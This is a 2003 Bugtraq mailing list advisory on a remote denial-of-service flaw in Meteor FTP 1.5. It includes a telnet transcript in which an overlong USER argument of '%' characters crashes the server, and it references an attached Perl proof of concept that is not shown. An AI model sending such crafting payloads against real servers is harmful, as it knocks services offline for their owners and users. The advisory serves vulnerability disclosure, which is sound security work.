Bugtraq mailing list archives
Remote denial of service vulnerability in Meteor FTP Version 1.5
From: Zee <zerash () evicted org>
Date: Sat, 9 Aug 2003 13:31:13 -0400 (EDT)
www.evicted.org zerash () evicted org August 8, 2003 Meteor FTP Version 1.5 Remote Denial of Service Vulnerability 1. Introduction ---------------- Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP. 2. Vulnerability ----------------- A vulnerability exists in Meteor FTP Version 1.5, which allows any malicious user to remotely cause a denial of service against the ftp server. By connecting to the Meteor FTP server and issuing USER followed by large amounts of data, the ftp server will crash. 3. Example ----------- Proof of concept exploit (meteordos.pl) is included in the attachment. root@openwire # telnet 192.168.1.14 21 Trying 192.168.1.14... Connected to 192.168.1.14. Escape character is '^]'. 220 Service ready for new user USER %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 530 Not logged on QUIT Connection closed by foreign host. root@openwire # telnet 192.168.1.14 21 Trying 192.168.1.14... Connected to 192.168.1.14. Escape character is '^]'. USER anonymous QUIT telnet> quit Connection closed. At this point the server has completely froze up. On the server side, the Meteor FTP spits out a dialog : "Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525), program terminated." By clicking "OK", Meteor FTP terminates. 4. Vendor status ---------------- Vendor has been notified, waiting for response... 5. Credits ----------- Vulnerability & code by zerash You can view this advisory at : http://www.evicted.org/projects/writings/mftpadvisory.txt You can view the exploit at : http://www.evicted.org/projects/code/meteordos.pl 6. Contact ----------- Please send suggestions, updates, and comments to : zerash () evicted org http://www.evicted.org
Attachment:
meteordos.pl
Description:
Current thread:
- Xprobe2 0.2rc1 release, white paper release, and Blackhat presentation availability Ofir Arkin (Aug 08)
- Message not available
- Remote denial of service vulnerability in Meteor FTP Version 1.5 Zee (Aug 09)
- Message not available